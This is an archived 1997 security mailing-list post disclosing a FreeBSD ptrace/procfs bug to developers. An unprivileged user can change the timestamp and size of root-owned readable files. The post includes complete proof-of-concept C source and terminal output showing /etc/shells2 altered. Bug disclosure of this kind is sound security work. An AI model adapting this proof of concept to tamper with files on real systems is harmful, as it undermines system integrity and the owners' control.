[32] in Best-of-Security
BoS: Re: [root@server.blaze.net.au: server security check output]
daemon@ATHENA.MIT.EDU (Tor Egge)
Fri Feb 14 23:26:43 1997
Cc: freebsd-current@freebsd.org
In-Reply-To: Your message of "14 Feb 1997 10:21:57 -0800"
Date: Fri, 14 Feb 1997 23:57:25 +0100
From: Tor Egge <Tor.Egge@idt.ntnu.no>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
----Next_Part(Fri_Feb_14_23:57:14_1997)--
Content-Type: Text/Plain; charset=us-ascii
> In article <19970215033810.19932@usn.blaze.net.au>,
> David Nugent <davidn@labs.usn.blaze.net.au> wrote:
>
> > This is the second time I've seen this since I last built
> > world - something has "touched" sendmail. It doesn't appear to
> > have been hacked, and I even checked the md5 against what it was
> > originally when I last installed sendmail and it hasn't changed.
> > But suddenly the file date has been modified, and only a couple
> > of hours ago.
>
> Yes, I have seen this sort of thing in all versions of FreeBSD
> since 2.0.5, the first one I used. It's not specific to sendmail,
> although I've only noticed it in setuid programs. (That may be
> just because those are the ones that show up in the security logs.)
> I have seen it happen to my X server a couple of times. It is some
> kind of anomaly involving the VM system, I would guess. I don't
> like it either, but nobody has ever been able to explain it, as
> far as I know. On my system, I see it maybe once every 4-6 months.
> I don't think anybody knows of a way to make it happen deliberately.
>
Using ptrace, you can touch any file for which you have read access.
A program for recreating this problem is appended.
This time, it also expanded the size of the file from 161 to 4096 bytes.
-----
ikke:/amd/kamelia/home/kamelia/a/tegge$ ls -l /etc/shells*
-rw-r--r-- 1 root wheel 161 Aug 17 1996 /etc/shells
-rw-r--r-- 1 root wheel 161 Aug 16 1996 /etc/shells.bak
-rw-r--r-- 1 root wheel 161 Sep 21 19:21 /etc/shells2
ikke:/amd/kamelia/home/kamelia/a/tegge$ ./timestampbug
fd = 3
len is 161
PT_ATTACH: got = 0, got = 0x00000000, errno=0, error=Undefined error: 0
waitpid: got = 0, got = 0x00000000, errno=0, error=Undefined error: 0
PT_READ: got = 419545088, got = 0x1901c000, errno=0, error=Undefined error: 0
PT_READ: got = 1766596643, got = 0x694c2023, errno=0, error=Undefined error: 0
ikke:/amd/kamelia/home/kamelia/a/tegge$ sync
ikke:/amd/kamelia/home/kamelia/a/tegge$ ls -l /etc/shells*
-rw-r--r-- 1 root wheel 161 Aug 17 1996 /etc/shells
-rw-r--r-- 1 root wheel 161 Aug 16 1996 /etc/shells.bak
-rw-r--r-- 1 root wheel 4096 Feb 14 23:39 /etc/shells2
---------
- Tor Egge
----Next_Part(Fri_Feb_14_23:57:14_1997)--
Content-Type: message/rfc822
To: dyson@freebsd.org, dyson@dyson.iquest.net
Subject: Re: More feedback on kern/1512
In-Reply-To: Your message of "Mon, 9 Sep 1996 10:13:35 -0500 (EST)"
References: <199609091513.KAA03606@dyson.iquest.net>
X-Mailer: Mew version 1.03 on Emacs 19.31.1
Mime-Version: 1.0
Content-Type: Multipart/Mixed;
boundary="--Next_Part(Fri_Sep_20_01:00:12_1996)--"
Date: Fri, 20 Sep 1996 01:00:20 +0200
From: Tor Egge <tegge@idt.unit.no>
Approved: proff@suburbia.net
----Next_Part(Fri_Sep_20_01:00:12_1996)--
Content-Type: Text/Plain; charset=us-ascii
Problem 1 in kern/1512 seems fixed. Good work.
Here is a short program to reproduce the timestamp problem reported in
kern/1512. By performing
as root:
cp -p /etc/shells /etc/shells2
as unprivileged user:
cc -o timestampbug timestampbug.c
./timestampbug
sync
/bin/ls -lT /etc/shells*
/etc/shells2 and /etc/shells no longer has the same timestamp.
There is at least one bug in /usr/src/sys/miscfs/procfs/procfs_mem.c
where a vm subsystem error code (KERN_PROTECTION_FAILURE) is passed to
the user program as an standard error code (ENOENT).
- Tor Egge
----Next_Part(Fri_Sep_20_01:00:12_1996)--
Content-Type: Text/Plain; charset=us-ascii
Content-Description: "timestampbug.c"
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <errno.h>
#include <sys/stat.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/ptrace.h>
#include <sys/signal.h>
#include <sys/wait.h>
char *map;
int fd;
struct stat stbuf;
pid_t pid;
int status;
char x;
main()
{
int got;
size_t len;
pid = fork();
assert(pid>=0);
if (pid==0) {
assert ( (fd = open("/etc/shells2",O_RDONLY,0)) >= 0);
printf("fd = %d\n",fd);
assert ( ! fstat(fd,&stbuf) );
len = stbuf.st_size;
printf("len is %d\n",len);
map = mmap( 0,len, PROT_READ,MAP_SHARED,fd, (off_t) 0);
assert (((int) map)!= -1 && map);
#if 0
printf("Child: map= 0x%08x\n",map);
fflush(stdout);
x = *map;
printf("Child: *map = %d\n",x);
fflush(stdout);
#endif
#if 0
errno = 0;
got=mprotect(map,4096,PROT_READ|PROT_WRITE);
printf("mprotect: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
#endif
sleep(10);
exit(0);
}
sleep(1);
errno = 0;
got = ptrace(PT_ATTACH,pid,0,0);
printf("PT_ATTACH: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
errno = 0;
waitpid(pid,&status,WNOHANG|WUNTRACED);
printf("waitpid: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
errno = 0;
got = ptrace(PT_READ_D,pid,(char *) &map,0);
printf("PT_READ: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
map = (char *) got;
#if 1
errno = 0;
got = ptrace(PT_READ_D,pid,map,0);
printf("PT_READ: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
#endif
#if 0
errno = 0;
got = ptrace(PT_WRITE_D,pid,map,got);
printf("PT_READ: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
errno = 0;
got = ptrace(PT_WRITE_D,pid,map+1024,got);
printf("PT_READ: got = %d, got = 0x%08x, errno=%d, error=%s\n",
got, got,errno,strerror(errno));
#endif
}
----Next_Part(Fri_Sep_20_01:00:12_1996)----
----Next_Part(Fri_Feb_14_23:57:14_1997)----
